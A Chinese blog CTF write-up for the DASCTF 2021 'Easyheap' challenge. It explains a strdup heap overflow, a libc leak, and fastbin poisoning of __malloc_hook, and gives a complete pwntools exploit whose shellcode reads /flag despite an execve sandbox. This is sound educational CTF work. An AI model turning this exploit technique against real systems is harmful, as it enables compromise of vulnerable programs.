2021DASCTF实战精英夏令营暨DASCTF July X CBCTF Easyheap

最新推荐文章于 2022-09-22 20:45:41 发布
最新推荐文章于 2022-09-22 20:45:41 发布
阅读量252 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119305240
版权
本文详细分析了一个存在堆溢出漏洞的程序,通过申请和释放内存,利用Fastbin Poisoning策略篡改内存结构,最终实现对__malloc_hook的控制,从而执行自定义shellcode,获取程序控制权。该过程涉及到了内存管理、指针篡改和系统调用等关键知识点。
摘要由CSDN通过智能技术生成

在这里插入图片描述保护是全开。

在这里插入图片描述开了一块空间,这块空间权限都有。

但是下面开了沙箱,ban了execve。

add
在这里插入图片描述
正常申请空间,写大小。
但是有个问题,我们输入要申请的空间大小之后,使用了一个strdup函数。
这个函数会根据你的字符串自动申请空间,那么就意味着我可以写0x500的大小,但是只输了一个字节。
就会造成溢出。

delete
在这里插入图片描述清空了。

show
在这里插入图片描述正常输出。

edit
在这里插入图片描述编写。

所以我们整个看下来,存在的问题就是有堆溢出。

那么我们利用这个溢出,首先申请释放一个大的chunk,挂进unsortedbin。
然后通过溢出,将上一个chunk内容一直写到这个chunk的fd前面,然后输出的时候就可以把地址带出来。

然后我们攻击,我们通过fastbin posioning,攻击fd,先申请到0x23330000,将shellcode写进去,再攻击malloc_hook,把0x23330000写道malloc_hook就可以了。

exp

from pwn import*

context.log_level = "debug"
context.arch = "amd64"
r = remote("node4.buuoj.cn", "28994")
#r = process("./Easyheap")
libc = ELF("./64/libc-2.27.so")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")

def add(size, content):
    r.sendlineafter(">> :\n", "1")
    r.sendlineafter("Size: \n", str(size))
    r.sendlineafter("Content: \n", content)

def delete(index):
    r.sendlineafter(">> :\n", "2")
    r.sendlineafter("Index:\n", str(index))
    
def show(index):
    r.sendlineafter(">> :\n", "3")
    r.sendlineafter("Index:\n", str(index))

def edit(index, content):
    r.sendlineafter(">> :\n", "4")
    r.sendlineafter("Index:\n", str(index))
    r.sendafter("Content:\n", content)

shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read(3,0x23330500,100)
shellcode += shellcraft.write(1,0x23330500,100)
shellcode = asm(shellcode)


add(0x500, "a" * 0x200)
add(0x500, "a" * 0x200)
add(0x500, "a" * 0x20)
add(0x500, "a" * 0x20)
add(0x500, "a" * 0x20)
#0-4

add(0x500, "a" * 0x500) #5
add(0x500, "a" * 20) #6
delete(5)

#gdb.attach(r)

edit(4, "a" * 0x30)
show(4)
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)


delete(1)
edit(0, "a" * 0x200 + p64(0) + p64(0x211) + p64(0x23330000))
add(0x500, "a" * 0x200) #1
add(0x500, shellcode.ljust(0x200, "\x90")) #7

delete(3)
edit(2, "a" * 0x20 + p64(0) + p64(0x31) + p64(malloc_hook))
add(0x500, "a" * 0x20) #1



add(0x500, "a" * 0x20) #7

edit(7, p64(0x23330000))
#gdb.attach(r)
add(0x500, "success!")

r.interactive()
yongbaoii
关注
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1383
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
2021 DASCTF July X CBCTF 4th/web/cat flag
Demonering的博客
08-16 453
题目源码: <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { highlight_file(__FILE__); } ?> 知识点: 1.绕过正则 2.escap
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th WriteUp
mumuzi的博客
08-02 3092
最后十分钟掉了4名可还行 只写自己做了的,队友出的就不写了 Crypto:Yusa的密码学签到——BlockTrick 不知道啥意思,反正当复读机就行了。 MISC-问卷题 DASCTF{79f3bb47a2e2d46def82c052eccb7b80}
2021DASCTF实战精英夏令营DASCTF July X CBCTF old_thing
yongbaoii的博客
08-12 450
RELRO半开。 进来以后首先需要登录。 用户名是admin,但是密码需要逆向一下。 进来之后是两个功能,一个leak,一个overflow。 因为开了canary,所以我们只要先把canary最后一个字节的’\x00’写掉,然后泄露一下就好了。 之后就是overflow一套带走。 ...
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 276
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
2021 MAR-DASCTF drinksometea
qq_37073764的博客
03-31 739
新手第一次见这种题,记录一下 压缩包给了一个exe还有一个png.out,那个png.out不知道干嘛用的。 查一下exe有无加壳,无,拖入ida进行分析。 程序流程不难,就是先从tea.png读入数据,然后经过中间的函数处理,然后把输出输出到tea.png.out。 题目要我们做的就是,用那个out文件,还原出png文件 进入4010A0函数,发现ida根本分析不了: 原来这就是传说中的花指令。 看了别的大佬博客才知道,对于00401116,有红色的这行语句按U,然后在Hex-view那里,把那行数据
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 701
胡小楠的刷题日常
关于2021年CS保研夏令营通知公告的汇总。欢迎大家积极分享夏令营信息
最新发布
08-27
关于2021年CS保研夏令营通知公告的汇总。欢迎大家积极分享夏令营信息,资瓷一下互联网精神吼不吼啊?
第23届全国高中学生化学竞赛(江苏赛区) 夏令营选拔赛试题.doc
11-01
【第23届全国高中学生化学竞赛(江苏赛区) 夏令营选拔赛试题.doc】 这份试题涉及高中化学竞赛的多个知识点,包括环境化学、无机化学、生物化学、化学平衡以及晶体结构等多个领域。 1-1 题目讨论了重金属污染处理...
2021-2022收藏资料南阳市第五届中小学生网络夏令营竞赛答案.doc
09-26
2021年09月16日
2020 CTF暑假夏令营培训Day1 安全杂项Misc
小哈里的博客
08-14 993
Day1安全杂项 WSL安装 程序和功能-启动windows功能-WSL win商店-ubuntu安装 file命令,查看文件格式 ubuntu账户:gwj12345,repeat Kali Linux账户:gwj12345,repeat 工具: 01编辑器(主要),Archpr(暴力开压缩包),AuDaCity(查看音频文件),JDK(JAVA运行环境),mp3SteGo(音频隐写),StegSolve(图片隐写),Wireshark(流量分析) 隐藏数据,文件拼接:copy /b 1.png+1.
2020 CTF暑假夏令营培训Day2 密码学Crypto 部分笔记
小哈里的博客
10-09 847
Day2密码学 - Crypto 架构 研究内容有:信息m的加密A、解密B、加密后的信息C(第三方是否可窃取)。 密码的分类:古典密码(关注算法的机密性,一般是置换和代换,打乱顺序,变量映射等),现代密码(假设算法大家都知道,关注信息本身的复杂度) 序列密码,核心为PRNG(伪随机数生成器)生成伪随机数序列,通过加密函数与明文加密生成密文,解密时生成一样的序列,用逆函数运算。 古典密码 历史:斯巴达密码棒,凯撒,维吉尼亚,希尔Hill,山农shannon,公钥ECC,DES,然后RSA,DSA,ECD
ctf-夏令营-crypto
zhang14916的博客
09-02 1213
1.通过nc端口可以获得一个加密算法的五个参数n,e,d,c2,r。几次nc发现参数n,e,d不发生变化,而c2和r在不断的变化,所以猜测这是一个RSA加密,而c2和r都是密文,进行尝试,发现c2解出的明文与r^-1相乘可以获得一段有意义的明文,即为答案 import gmpy2 def shuchu(mingwenstr): if mingwenstr[len(mingwenstr)...
2020DASCTF——七月赛
cwr1499640048的博客
07-25 1430
CRYPTO——bullshit 题目源代码 def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,len(message)
2021DASCTF实战精英夏令营“签到”
weixin_48427966的博客
08-03 276
靶机地址: node4.buuoj.cn:28466 kali里面运行命令,出现第一行加密,将第一行加密复制,再次回车,出现try again。 然后再次输入以后,出现flag。
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 534
DASCTF 7月赋能赛pwn wp
DASCTF Oct X 吉林工师 欢迎来到魔法世界 部分wp
weixin_44088994的博客
11-21 3949
存一下题(呜呜呜菜狗就是菜狗wp都看不懂 参考:七月大佬DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WP – 七月的摸鱼历程 魔法密文 Writeup| DASCTF Oct X 吉林工师_张麦麦的博客 zhangmaimai.com-CSDN博客 DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女_llx101388627的博客-CSDN博客 签到 1.give you flag 2.闯入魔塔的魔法少女 3.魔法信息 4.魔法秘文 5.卡比卡比
DASCTF2020 7月月赛
qq_42158602的博客
07-25 781
bullshit 题目 from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,le
2022DASCTF MAY 出题人挑战赛
Sk1y的博客
05-26 759
2022DASCTF MAY 出题人挑战赛 文章目录2022DASCTF MAY 出题人挑战赛Power魔法浏览器 Power Cookie发包,回显中有个 在cookie加一个 admin=1 得到flag DASCTF{ad2e3900-06dd-4b04-9cec-1a8878a3777f} 魔法浏览器 f12查看 然后修改报文 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值